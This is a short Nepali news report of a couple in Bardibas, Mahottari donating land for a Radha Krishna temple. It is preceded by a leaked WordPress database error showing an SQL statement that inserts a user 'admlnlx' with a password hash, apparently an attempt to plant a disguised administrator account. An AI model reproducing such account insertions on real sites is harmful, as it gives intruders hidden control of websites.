WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2KsKk8PUy5kBvDLbn3RSQR.iq3yj4/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:25:51', '', 'admlnlx', 'admlnlx')
महोत्तरी, मंसिर २० – एक दम्पतीले राधाकृष्ण मन्दिर निर्माणका लागि लाखौँ मूल्य पर्ने जग्गा निःशुल्क रुपमा दान गरेको छ ।
बर्दिबास नगरपालिका–२ का योगेन्द्र र समिता हमालले रमन्दिर निर्माण गर्नका लागि सडक छेउमै रहेको चार धुर जग्गा दान गरेका हुन् । योगेन्द्रले आफ्ना बुबा स्व नारायणबहादुर र आमा दुर्गा हमालका स्मृतिमा रु १६ लाख मूल्य बराबरको सो जग्गा प्रदान गरेको स्थानीय सामाजिक अभियानकर्मी राजकरण महतोले बताउनुभयो । – रासस